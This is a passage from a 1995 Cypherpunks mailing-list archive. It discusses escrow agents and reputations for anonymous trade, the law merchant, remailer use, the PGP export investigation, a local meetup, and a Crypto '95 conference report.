21:44:22 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Sep 95 21:44:22 PDT Subject: Cyphernomicon, and a section on Escrow and Reputations Message-ID: I've been asked by two people in e-mail what the "Cyphernomicon" I referred to in a recent message is. It's been a while since I mentioned it, so I'll give some details. In late 1993 I foolishly committed to doing a "Cypherpunks FAQ," as several earlier attempts had gone nowhere. And since the most frequently asked question of all is always "Where's the FAQ?," followed closely by "How come there isn't a FAQ?," the need was there. (As it turns out, the people most in need of a FAQ seldom read FAQs, but this is another story.) I finished my first release, a megabyte-sized file done in MORE, a powerful outline processor (which enabled me to maintain notes, make cross-references, and generally manage such a huge writing project). I released it last year, and put it in my anonymous ftp account at ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom is often very crowded, though. I know of a couple of alternative places. A very nice job of HTMLizing it was done by Jonathan Rochkind, a Cypherpunk, and is located at the URL http://www.oberlin.edu/~brchkind/cyphernomicon/ Another URL, which is just one large file, is http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ The recent thread about the dangers of anonymity and the role of escrow agents as possible fixes is a good excuse to include one of my sub-sub-subsections, to also illustrate the structure and expected contents. Enjoy it. But, please, don't nag me with suggestions that I should do, or should have done, the thing in HTML, or using your favorite tool set. --Tim May Crypto Anarchy: Escrow Agents and Reputations 16.24.1. Escrow Agents as a way to deal with contract renegging - On-line clearing has the possible danger implicit in all trades that Alice will hand over the money, Bob will verify that it has cleared into hisaccount (in older terms, Bob would await word that his Swiss bank account has just been credited), and then Bob will fail to complete his end of the bargain. If the transaction is truly anonymous, over computer lines, then of course Bob just hangs up his modem and the connection is broken. This situation is as old as time, and has always involved protcols in which trust, repeat business, etc., are factors. Or escrow agents. - Long before the "key escrow" of Clipper, true escrow was planned. Escrow as in escrow agents. Or bonding agents. - Alice and Bob want to conduct a transaction. Neither trusts the other; indeed, they are unknown to each other. In steps "Esther's Escrow Service." She is _also utraceable_, but has established a digitally-signed presence and a good reputation for fairness. Her business is in being an escrow agent, like a bonding agency, not in "burning" either party. (The math of this is interesting: as long as the profits to be gained from any small set of transactions is less than her "reputation capital," it is in her interest to forego the profits from burning and be honest. It is also possible to arrange that Esther cannot profit from burning either Alice or Bob or both of them, e.g., by suitably encrypting the escrowed stuff.) - Alice can put her part of the transaction into escrow with Esther, Bob can do the same, and then Esther can release the items to the parties when conditions are met, when both parties agree, when adjudication of some sort occurs, etc. (There a dozen issues here, of course, about how disputes are settled, about how parties satisfy themselves that Esther has the items she says she has, etc.) 16.24.2. Use of escrow services as a substute for government + as in underworld deals, international deals, etc. - "Machinery of Freedom" (Friedman), "The Enterprise of Law" (Benson) - "It is important to note in any case that the use of third- party escrow as a substitute for Government regulation was a feature of the Northern European semi-anarchies of Iceland and Ireland that have informed modern libertarian thought." [Duncan Frissell, 1994-08-30] 16.24.3. Several people have raised the issue of someone in an anonymous transaction simply taking the money and not performing the service (or the flip side). This is where _intermediaries_ come into the picture, just as in the real worl (bonds, escrow agents, etc.). 16.24.4. Alice and Bob wish to conduct an anonymous transaction; each is unknown to the other (no physical knowledge, no pseudonym reputation knowledge). These "mutually suspicious agents," in 1960s- and 70s-era computer science lingo, must arrange methods to conduct business while not trusting the other. 16.24.5. Various cryptographic protocols have been developed for such things as "bit commitment" (useful in playing poker over the phone, for example). I don't know of progress made at the granularity of anonymous transactions, though. (Though the cryptographic protocol building blocks at lower levels--such as bit commitment and blobs--will presumably be used eventually at higher levels, in markets.) 16.24.6. I believe there is evidence we can shorten the cycle by borrowing noncryptographic protocols (heresy to purists!) and adapting them. Reputations, for example. And escrow agents (a form of reputation, in that the "value" of a bonding entity or escrow agent lies in reputation capital). 16.24.7. if a single escrow agent is suspected of being untrustworthy (in a reputation capital sense), then can use _multiple_ escrows - with various protocols, caveat emptor - n-out-of-m voting schemes, where n escrow agents out of m are required to complete a transaction - hard to compromise them all, especially if they have no idea whether they are being "legitimately bribed" or merely pinged by a reputation-rating service - Hunch: the work of Chaum, Bos, and the Pfaltzmanns on DC- nets may be direcly applicable here...issues of collusion, sets of colluders, detection of collusion, etc. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From don at cs.byu.edu Fri Sep 1 21:58:01 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Fri, 1 Sep 95 21:58:01 PDT Subject: SSL attack Message-ID: <199509020358.VAA00340@wero> -----BEGIN PGP SIGNED MESSAGE----- From: "Robert A. Rosenberg" >I thought that the ACK gives starting location and number of segments. If I >get 500 segments and ACK at the 50% point I am sending an ACK for the >Starting Point and 250 Segments (the unprocessed part would then ACK With multiple heirchical servers, you don't have the same bottleneck problems. If you have a random mode that you can switch into, same deal (if you care to use it). There are a lot of people who want the anonymity and server-independance of random mode. There are people who don't want to add another 37% onto the processing time, given the unlikeliness of a D.O.S. attack on the server. I continue to support the idea of a two-pronged attack using both methods. Given that most of the server bottleneck was un-updated clients anyway, I think that the bottleneck-on-the-server problem is solved anyway, meaning there won't be any problems getting new keys - thus eliminating the need for a keyspace buffer queue. Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMEfVssLa+QKZS485AQEV9QMAoue7RyySe1H0a7s6hBkjf7knaXesLY1h ZQg9rBZ9ZieJ5qWyBHL03Gn4XikSD8U6/MBbiyMvOnz+QTYRQcMxQioEu4YDcFdD etaful6wYhtXzd/MTn+VWjBf86poDeNK =Mp2o -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From todd at lgt.com Fri Sep 1 22:07:18 1995 From: todd at lgt.com (Todd Glassey, Chief Technologist, Looking Glass Technologies) Date: Fri, 1 Sep 95 22:07:18 PDT Subject: FSTC - Request for Info Message-ID: Hi all, I am now looking for pointers into this mystical coonsortium of financial wizards... Also do any of you know about online issues pertaining to new network adaptations of Unisys's proprietary banking protocols or the FEDLINE stuff? TIA Todd Regards, T. S. Glassey Chief Technologist Looking Glass Technologies todd at lgt.com From jcurran at bbnplanet.com Fri Sep 1 22:33:03 1995 From: jcurran at bbnplanet.com (John Curran) Date: Fri, 1 Sep 95 22:33:03 PDT Subject: FSTC - Request for Info Message-ID: At 1:05 AM 9/2/95, Todd Glassey, Chief Technologist, Looking Glass Technologies wrote: >Hi all, > I am now looking for pointers into this mystical coonsortium of financial >wizards... A good place to start is the FSTC WWW pages: http://www.llnl.gov/fstc /John From loki at obscura.com Fri Sep 1 23:33:08 1995 From: loki at obscura.com (Lance Cottrell) Date: Fri, 1 Sep 95 23:33:08 PDT Subject: Direct Socket to Remailer? Message-ID: At 7:25 PM 9/1/95, ROBO Mixmaster Remailer wrote: >I've heard of telnetting to port 25 to send SEMI-untraceable e-mail. >The procedure, quite frankly, sounds rather complicated. > >Most of my mail that I don't want traced goes through the Mixmaster >remailer network. I'm using Winsock-compatible software via a PPP >connection. Is it possible, for example, to tell my mailer software >to use the remailer itself, such as "remail.obscura.com" as the mail >host, rather than "mail.myISP.com"? Will it work, at least for >sending, without having an account at "obscura.com", or whatever >remailer? Would that be less traceable than sending it through my >ISP's mail host? I don't think it would provide much more security, but it might keep you ISP from logging the mail. If you are using mixmaster at remail.obscura.com as your remailer, you are welcome to use it as the mail host for that mail. It is a slow connection so please do not use is as your regular mail host. You should try the telnet port 25 trick. It is amazingly simple (but not secure). Just "telnet some.machine.com 25" and type help. It will guide you through it. It is quite informative. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From davidm at iconz.co.nz Fri Sep 1 23:40:55 1995 From: davidm at iconz.co.nz (David Murray) Date: Fri, 1 Sep 95 23:40:55 PDT Subject: A problem with anonymity Message-ID: <199509020640.SAA23731@iconz.co.nz> -----BEGIN PGP SIGNED MESSAGE----- At 05:15 PM 9/1/95 -0700, you wrote: >At 10:45 AM 9/2/95, David Murray wrote: >>[Akerlof, if I remember my economics right (and I am confident that I will >>be corrected if I don't) analysed a market for used cars. ... >>... So the only cars for sale would be lemons :-)] > >I haven't encountered this example, but it clearly misses some important >real-world issues. ... >Like a lot of simple game-theoretic models, the application to the real >world is quite different. True. But it does make the point that, in a perhaps surprising way, the bad can drive out the good. [I certainly don't want to get into any kind of normative v. postive methodological debate.] The lesson is not that "You can never find a decent used car", but that, in a market with particular characterisics (particularly with regard to what information is available to whom), lemons drive out the good. This just means that owners of good used cars offer them for sale in a market where pre-purchase checks are possible, etc.. But this is to concentrate on the example, not on the substance... >But I certainly agree that crypto will reignite interest in analyses of >such game theory questions. Another way of viewing anonymity vs. >non-anonymity is that knowing the True Name of a party with whom one trades >is just _one element_ of a transaction. By no means is it essential. I guess I was using True Name somewhat unusually. I didn't mean "True Name= state approved unique identifier of a human being" so much as "True Name<> easily discardable/transferrable/sellable digital pseudonym". I certainly did not mean to imply that net.commerce is impossible, or that it would only take place on the basis of True Names, however defined. Rather I was commenting that one pervasive feature of non-net.commerce is the ability to track down someone that owes you something and sue them/beat it out of them. You can't do this to a digital pseudonym. As you rightly pointed out, you can't do this to someone who escapes to South America, or to the guy who runs the market stall that won't be there tomorrow. So you take a bond, or you take your chances. I still think that, because of the (perfect) ease with which net.rep's are transferrable/cash-in-able, the chances you take in the digital domain are so much higher as to be (almost?) qualatatively different. >>If you can't rely on the unsecured promise of a digital pseudonym, and you >>can't accept reputation as 'security', how do you extend credit? > >I am willing to extend some amound of credit to PrOduct Cypher, Black >Unicorn, etc., based on their past reputation and on the fact that I can >show to others the transactions into which their pseudonyms entered and >thus expose them if they default. Now _how much_ I'm willing to extend is >of course a more complicated issue, but the principal is still there: a >purely digital pseudonym, with no possibility of being tied to a True Name, >can still be extended credit....I just said I would do so. This would, of course, allow PrOduct Cypher (for example) to cash in on hir rep. [Hir - never thought I'd see myself use it: ughhhhhhh ]. But, unlike the unscrupulous stall owner, who would have to sell the gold watch before he decamped, PC could sell hir rep before the rip-off had been done. This would be a sort of division of labour - rep-builders and rep-exploiters. In cybersapce, you could never tell whether you were dealing with the rep builder (buying a good car) or a rep exploiter (buying a lemon). Yes the rep-exploitation would be a one-shot thing. Within seconds of the sting PC's name would be mud. [And, yes, you could probably tell whether it was one of those two you were dealing with - if it asked for credit, it wouldn't be 'corn or 'pher :-)] But it is the _possibility_ of the scam that would shape the market. By the way, my final question was not rhetorical. I _do_ think methods of extending credit to pseudonyms will be developed. I just think they will be based on (possibly new) types of security interest. An old type of security interest (perhaps the oldest) could be used right away - the pledge. If Bob Pseudonymous pledges $100 worth of digital certificates, I would be glad to lend him $100 (well, perhaps $80 - gotta secure the interest:-) Cryptography might develop other ways of protecting the interests of creditors, while preserving the anonymity of debtors. In fact, I'm certain it will. And I'm just as sure the law/mercantile practice will assist in the process. And like you, I believe it is not only possible, but preferable, that this is done without the interevention/'assistance' of the state. Cheers, Dm -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEftjllo3j8JHzalAQE1OwP+IQTX2hUfJXI8Q7ojgFcKbnvxRLngSyDp rLm0wjZvMoiLwCqwhqn6F3ypTJBD0pS1ZT7ql+rnnEsYtQ75Xu0iJFbnnIY4whNh gB1plcImYms88Rt7VEuCjHZeAMHcV3tPZL9DHQVHZXMwqWKCeyBaImVaEosJTwZj IuZ4HHCi+GE= =V7vf -----END PGP SIGNATURE----- From dsc at swcp.com Sat Sep 2 02:15:27 1995 From: dsc at swcp.com (Dar Scott) Date: Sat, 2 Sep 95 02:15:27 PDT Subject: Cyphernomicon, and a section on Escrow and Reputations Message-ID: >I finished my first release, a megabyte-sized file done in MORE, a powerful >outline processor (which enabled me to maintain notes, make >cross-references, and generally manage such a huge writing project). I >released it last year, and put it in my anonymous ftp account at >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom >is often very crowded, though. After several tries I was not able to get this. Has anyone made it available in an alternate location? Dar (list newbie) =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 <--- 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html My preference for attached files are in this order: AOL, Mime, Binhex4, PGP, UUencode =========================================================== From terrell at sam.neosoft.com Sat Sep 2 07:42:13 1995 From: terrell at sam.neosoft.com (Buford Terrell) Date: Sat, 2 Sep 95 07:42:13 PDT Subject: A problem with anonymity Message-ID: <199509021451.JAA14144@sam.neosoft.com> > >Subject: Re: A problem with anonymity >From: monty.harder at famend.com (MONTY HARDER) > >TC> This is one thing that _bonding_ is designed to partially ameliorate. One >TC> posts a bond which is greater than the amount being carried, or at least is > > A variation of a bond is an escrow agent.... > > Overload Alert: I use "escrow" here in the more mundane sense of > the folks who collect your real estate taxes and homeowners' > insurance from you 1/12th at a time along with your mortgage > payment, for instance. > > If the buyer has a =nonymous= agent to recieve the payment, which is >only released to the seller upon proof(s) of performance (whether in >lump sum or on a schedule of staged payments tied to specific milestones >in a long-term project) then the buyer has someone to go after in the >event of such shenannigans. > >TC> There are still scams and manouvers to thwart this reputation capital >TC> scheme. The agent planning to "defect" (default, split, abscond, renege, >TC> etc.) can try to pile up as many pending transactions as possible, >TC> anticipating that the various transactees will be unaware of each other. > > And the escrow method dynamically scales to meet this threat, whereas >the bond is static. > > Of course, the escrow agent will extract his pound of flesh, just as >any other form of insurance. Such is the nature of life. > Actually, you guys are trying to repeat the whole history of the law merchant (today's commercial law). The basic problem was how can a buyer in one city acquire goods from a seller in another through agents acting at a distance when neither knows the other and neither is willing to risk loss on the transaction. The use of bankers, as either trusted or bonded third parties, acting as escrowees under the control of a letter of credit was the result. Buyer, B, deposits money with the bank, E, with insructions to release the money on proof of receipt of the goods. E gives B a receipt and a written promise to pay. B trades the promise to pay to Seller, S, in exchange for the goods. S, who either trusts E or has access to his bond, is willing to accept E's promise to pay, which he then negotiates. The result is that B and S have a secure transaction without trusting each other, and E gets rich. Notice, we don't care about the reputation or identity of either B or S, and a very few trusted or bonded Es can facilitate many many transacrions. Incidentially, you all are using the word "escrow" correctly. An escrow is an arrangement in which property is deposited with an escrowee to hold until the happening or failure of a contingency, at which time he delivers the property according to the escrow instructions. House sales, in which the seller deposits a deed and the buyer deposits the purchase price pending proof of title is only one kind of escrow. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ Buford C. Terrell South Texas College of Law 1303 San Jacinto, Houston, TX 77002 (713)646-1857 terrell at sam.neosoft.com +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ From ethridge at Onramp.NET Sat Sep 2 07:59:29 1995 From: ethridge at Onramp.NET (Allen B. Ethridge) Date: Sat, 2 Sep 95 07:59:29 PDT Subject: Macintosh Users: "SpeedDoubler" Message-ID: Tim May wrote: >For you Macintosh users, I thought I'd share with you my experiences with >SpeedDoubler, a new utility that (effectively) doubles or even triples >performance of many applications that still are heavily dependent on 68K >code (as opposed to purely PowerPC code). > > ... > >All I can say is that I'm very happy. > >--Tim May Just wanted to echo Tim's sentiments. I purchased SpeedDoubler yesterday (fifty-something dollars at Computer City) and the speed improvements i've seen on my PowerMac 7100/66 are impressive. It's definitely worth the money. allen From tcmay at got.net Sat Sep 2 09:39:05 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Sep 95 09:39:05 PDT Subject: A problem with anonymity Message-ID: At 2:27 PM 9/2/95, Buford Terrell wrote: >Actually, you guys are trying to repeat the whole history of the >law merchant (today's commercial law). The basic problem was how >can a buyer in one city acquire goods from a seller in another >through agents acting at a distance when neither knows the other >and neither is willing to risk loss on the transaction. Which might be why I specifically cited this last night in an article in this thread: "(Think of various trading situations where one has no idea of the True Name of the other parties: cash-and-carry transactions, flea markets, many international trade arrangements, etc. As we have discussed in past discussions of anarchy, the international trading regime is essentially an anarchy, in that no Higher Authority exists to resolve disputes in a top-down way...the so-called "Law Merchant" evolved to resolve disputes in such trading situations.)" Benson's "The Enterprise of Law" is of course a libertariant outlook on these matters. (I should mention that Michael Froomkin says he doesn't think much of it, but I found it useful, especially as it confirmed my views on these matters! :-}) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Sat Sep 2 09:54:21 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Sep 95 09:54:21 PDT Subject: Cyphernomicon, and a section on Escrow and Reputations Message-ID: At 9:13 AM 9/2/95, Dar Scott wrote: >After several tries I was not able to get this. Has anyone made it >available in an alternate location? > >Dar >(list newbie) > >=========================================================== >Dar Scott Home phone: +1 505 299 9497 > >Dar Scott Consulting Voice: +1 505 299 5790 <--- >8637 Horacio Place NE Email: darscott at aol.com >Albuquerque, NM 87111 dsc at swcp.com > Fax: +1 505 898 6525 >http://www.swcp.com/~correspo/DSC/DarScott.html Help me out here, Dar... You list a Web site in your sig, so presumably you have the right tools to browse the Web. And I listed two Web sites that have the Cyphernomicon. What am I missing? Browsing the Web versions, especially the HTMLized version by Rochkind at http://www.oberlin.edu/~brchkind/cyphernomicon/ is a much better way to read it than by downloading the text version. Nevertheless, if someone wants to copy the CP-FAQ file to their ftp site, I have no real objections at this time. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jim at acm.org Sat Sep 2 10:37:25 1995 From: jim at acm.org (Jim Gillogly) Date: Sat, 2 Sep 95 10:37:25 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com> Message-ID: <199509021737.KAA23763@mycroft.rand.org> Regarding the stature of limitations date on PRZ, > "Perry E. Metzger" writes: > The offense in question took place on or before > September 8, 1992, and the statute of limitations is, to my knowledge, > three years. Even if it were four years, it would have to be September > 8th of that year. Branko Lankester announced availability of PGP 2.0 > on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that > he exported PGP Version 1.0 to the team that developed PGP 2.0 > overseas, any export that Phil performed would have of necessity to > have taken place before then. PGP 1.0 was available in at least Finland and Australia by 28 Aug 91, according to an ftp list John Gilmore posted on that date. However, the first available date is presumably not as important as the most recent offense, and I haven't seen which specific allegations the gov't is investigating. Jim Gillogly 11 Halimath S.R. 1995, 17:35 From tcmay at got.net Sat Sep 2 11:01:19 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Sep 95 11:01:19 PDT Subject: Cypherpunks Santa Cruz -- Great Party! Message-ID: I want to update the general list on how well our "Cypherpunks Santa Cruz" party/meeting went last Saturday. Apologies to those who get this twice, as I just sent it out to the folks on the mailing list of interested folks I keep. (Not all of them are readers of this list, so....) It was a great success, from all indications, and we'll be doing it on a regular basis. "Meet locally, communicate globally." --Tim >Date: Sat, 2 Sep 1995 11:03:33 -0700 >X-Sender: tcmay at mail.got.net >Mime-Version: 1.0 >To: (Recipient list suppressed) >From: tcmay at got.net (Timothy C. May) >Subject: Cypherpunks Santa Cruz -- Great Party! > > >This is a report on the Cypherpunks Santa Cruz party/meeting held last >Saturday at my house. For those of you on this list (52 at last count, >obviously not all locals) who missed it, it was considered by many who >commented to me to be a great success. > >Some highlights: > >- I counted 23 attendees, from as far away as Oregon (Greg Broiles) and San >Luis Obispo (Jeff Simmons), and with a bunch of folks from Marin and the >Greater Bay Area. > >- We got rolling around 5, when the first cars started filling up my >parking area. Things kept going 'til 5 in the morning (!), when the last >stragglers departed and those staying the night found their futons and >crashed. > >- Not too much was formally done. We had a round of introductions (and I >provided name tags, which were purely voluntary, in that anyone could >volunteer not to wear them and hence not be remembered by others...most >wore them). Later, after the barbecue, Bob Fleming and Cherie Kushner >described their work on micropower, ultrawideband radio "localizers." While >not strictly "crypto" related, there are overlapping themes (privacy, >surveillance, and even some of the math overlaps). > >- Mostly it was a chance for our local community of folks interested in >these issues to mingle and make contact. I expect we may have a larger >focus than just "crypto" (although Cypherpunks have always had a larger >focus than just cryptography, of course). Especially as there are folks >doing some neat stuff on the Web out here in Santa Cruz. > >- Two folks from my local ISP attended (Jay and Marc), and they have some >thoughts on possibly hosting the Cypherpunks archive site on their system, >and other ideas. They stayed until nearly 5 a.m., talking with us about >networking, Web pages, etc. > >(Santa Cruz has long been a hotbed of computer activity, especially of the >more independent sort. So the good turnout from local folks could be very >promising for Cypherpunks themes. Interestingly, Linus Torvaldis (sp?), of >Linux fame, had just been in town a couple of days before.) > >I want to avoid opening the meeting up too broadly, to, for example "anyone >interested in computers," as this would produce unpredictable turnouts and >lots of folks who want to learn to use Windows, or need help in dBase, etc. >Better to keep an ostensible focus on "Cypherpunks" themes, with forays >into related areas. > >Some people commented to me that they hope the meetings/parties are >monthly, but I suspect every other month may be more reasonable...after >all, a monthly meeting would mean another one only 3 weeks from today, and >I can't see this happening. > >Anyway, I expect to announce another one for sometime in October. I also >may be having a "PenSFA" party at my place in early November (11/11 is >being considered), and may merge the two. It's a good opportunity for >mingling. > >Another attendee offered the possibility of having a Cypherpunks Santa Cruz >meeting/party at her house, so some rotation to other venues may start to >happen. I think the notion of having these things at private houses is >better than trying to get space at a local company, for example. Parties in >houses are more intimate, less formal, and don't require the "corporate >approvals" that are sometimes needed. Besides, I'm offering my house and >have no contacts at local companies. > >I expect to be able to host a lot of these things, and if some others >volunteer as well, we'll be set. (I expect attendance will not equal the 23 >at this "first" meeting, for obvious reasons. This means meetings/parties >could even be held in apartments or condos. But I'm not suggesting this, >only noting it.) > >So, thanks for coming! > >--Tim May > ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From adwestro at ouray.cudenver.edu Sat Sep 2 11:18:31 1995 From: adwestro at ouray.cudenver.edu (Alan Westrope) Date: Sat, 2 Sep 95 11:18:31 PDT Subject: Phil Zimmermann/Amnesty International? In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 02 Sep 1995, "Perry E. Metzger" wrote: > Alan Westrope writes: > > Michael Froomkin wrote: > > > PS when does the statute of limitations run out? > > June '96. Zimmermann and Dubois appeared on a local talk radio show > > recently; a friend happened to catch the program, taped it, and played > > excerpts at a Cypherpunks meeting. This date was mentioned by Phil Dubois. > That's not possible. The offense in question took place on or before > September 8, 1992, and the statute of limitations is, to my knowledge, > three years. Even if it were four years, it would have to be September > 8th of that year. Branko Lankester announced availability of PGP 2.0 > on Mon, 7 Sep 1992 at about 20:22 GMT, so since the allegation is that > he exported PGP Version 1.0 to the team that developed PGP 2.0 > overseas, any export that Phil performed would have of necessity to > have taken place before then. Point taken. Dubois was referring specifically to the current California grand jury investigation in association with U.S. Customs. He said that this grand jury has until June '96 to issue an indictment or...uhhh...get off the pot. I suppose Phil could be charged by some other entity with ITAR/DTR violations relating to the "export" of PGP, and I'm not sure what would be the date of this putative violation: the date Phil gave the program to others, allegedly "knowing" that doing so would result in its export; or the date PGP actually appeared at overseas sites. I suspect I'm not the only one confused by this, considering the convoluted, baroque and outdated laws involved. Mebbe somebody oughta ask Sternlight...:-) Alan Westrope __________/|-, (_) \|-' 2.6.2 public key: finger / servers PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMEieZVRRFMq4NZY5AQF8aAP+MoWcVxn5tVTJ2+SM5HTGFEQqwVnOae2L cNUaiq2gnogX3lNBV4Deou9WOauzde13FO9SRlHsqHw8D9YnQI14JburLwn4HCnf GdKs48DWzrG7HR4n1u2cmhqdm3TI7/ylyBbK2DhlUS98JOO0Q0m9+E6uSUcy+NNM Mq8y7jSD8f8= =K8td -----END PGP SIGNATURE----- From dsc at swcp.com Sat Sep 2 11:44:16 1995 From: dsc at swcp.com (Dar Scott) Date: Sat, 2 Sep 95 11:44:16 PDT Subject: No Subject Message-ID: Timothy May wrote concerning Cyphernomicon, >You list a Web site in your sig, so presumably you have the right tools to >browse the Web. And I listed two Web sites that have the Cyphernomicon. > >What am I missing? Thanks for the advice. Here are the two missing pieces. The first is financial, but might be really psychological. I buy PPP service locally and it is hard for me to casually browse with the meter runing in the corner of the screen even at less than a penny a minute. (And any document that mentions David Friedman probably needs study and that takes more time.) The second is that even at the wee hours of the morning I kept getting refusals from www.oberlin.edu and I couldn't get past the table of contents. I had hoped to collect these as I browse 'em to avoid delays (14.4), hicups and online time in later reading. (I didn't even try the large html--I suspect my browsers will gag on it.) The third of the two reasons is some vague notion of taking it to lunch or of anotating the file or the hard copy. In case it wasn't clear--I couldn't get a peep out of netcom. My plan is to try oberlin again and if that bogs down, try getting the copy at the location mentioned by Lou Poppler--or any other location mentioned this weekend. Or respond to advice on the best times to try netcom. I appologize for the implicit assumption in my question about alternate sites that people had your permission to copy the file to their ftp sites and am pleased that you explicitly gave that blessing in your recent mail. Thanks, Dar (list newbie) =========================================================== Dar Scott Home phone: +1 505 299 9497 Dar Scott Consulting Voice: +1 505 299 5790 <--- 8637 Horacio Place NE Email: darscott at aol.com Albuquerque, NM 87111 dsc at swcp.com Fax: +1 505 898 6525 http://www.swcp.com/~correspo/DSC/DarScott.html My preference for attached files are in this order: AOL, Mime, Binhex4, PGP, UUencode =========================================================== From jsimmons at goblin.punk.net Sat Sep 2 12:13:39 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Sat, 2 Sep 95 12:13:39 PDT Subject: Cyphernomicon for ftp Message-ID: <199509021911.MAA15754@goblin.punk.net> I remember the trouble I had finding a text copy of the Cyphernomicon ... So until someone posts it on a site with higher bandwidth, it's available at: ftp.goblin.punk.net/pub/docs/cypherpunk.faq.gz or cypherfq.zip We're talking 400K+ over a 28.8 modem, so don't expect much in the way of speed ... -- Jeff Simmons jsimmons at goblin.punk.net From hfinney at shell.portal.com Sat Sep 2 13:20:42 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 2 Sep 95 13:20:42 PDT Subject: Crypto '95 report Message-ID: <199509022019.NAA21443@jobe.shell.portal.com> This was the first year I attended a Crypto conference (although for the last two years I have "crashed" the evening rump session, where less formal 5-10 minute presentations are given). A number of list members were present and it was good to meet a lot of new people. I was a bit disappointed that few of the technical sessions were in areas that I am interested in or that seem to have bearing on CP issues. I have read many of the Crypto proceedings and this year the pickings seemed to be unusually slim. Richard Schroeppel gave a very clear presentation on an implementation of elliptic curve cryptography for a diffie-hellman-like key exchange. This is a two-dimensional variation from the regular integers that are used in most of the number theory based crypto, and has some advantages. This new implementation is actually faster than regular DH for apparently the same security level. It looks like elliptic curve crypto is on the threshold of coming into widespread use. I believe the patent situation is one of the main reasons. There were several papers on secret sharing, something we have discussed here as an alternative to escrow for handling lost keys. Amir Herzberg et al had a method for "resharing" a shared secret periodically and securely, so that if an adversary was stealthily sneaking in and learning shares occasionally, he would be put back to square one when the secret resharing phase occured. Only the trustees are involved, not the original secret holder, and the secret does not have to be reconstructed during the resharing. Bruce Dodson presented some results on using the Number Field Sieve factoring algorithm. Their implementation looks to be the fastest available now, considerably better than the Quadratic Sieve that was used for RSA-129. I belive they estimated 1000 MIPS years would have been enough for NFS to do RSA-129 compared to the 6000 MIPS years for QS. They are now going to try another challenge number, RSA-130. (RSA has challenge numbers every 10 digits in size (or maybe it was 5): RSA-140, RSA-150, etc.) There was one paper on electronic cash, by Okamoto. His technology is distinguished by allowing divisibility - you can take a $10 and divide it into 2 $5's without going back to the bank. However he has always had a problem that your various pieces of cash are linkable, although not traceable to the user who withdrew them. His new method uses smaller amounts of data. I was encouraged to see some progress on the linkability issue: for the first time (that I have seen) he admits it as a problem; he now has it so that theoretically the linkability is only within a single divided piece of cash (so that if you didn't divide you wouldn't have linkability). Actually the overheads are too large for this to by quite true, but it is a step in the right direction. He also included elimination of linkability as a future goal. Unfortunately his oral presentation was extremely shallow, mostly describing what electronic cash was. There was also a paper on "fingerprinting", the encoding of hidden information into a document so that if the doc is leaked it can be traced to the leaker. The talk wasn't very clear but I was able to glean enough that I now believe that this is possible whereas I didn't before. I was discouraged to see a whole session on key escrow. One presenter described key escrow as a whole new area of cryptography, analogous to the discovery of public key crypto when all that was known previously was conventional key. Now there are three areas. The academic crypto community seems to be greeting key escrow enthusiastically as a new technical challenge. The rump session had some good stuff, I thought. Matt Blaze et al had a paper on "Master Key" cryptosystems, a variation on escrow where the government can read all the messages using a certain cryptosystem. They pointed out the similarity to the trap door concept used in public key cryptography and concluded that an efficient master key system would be an efficient public key system. If you believe that 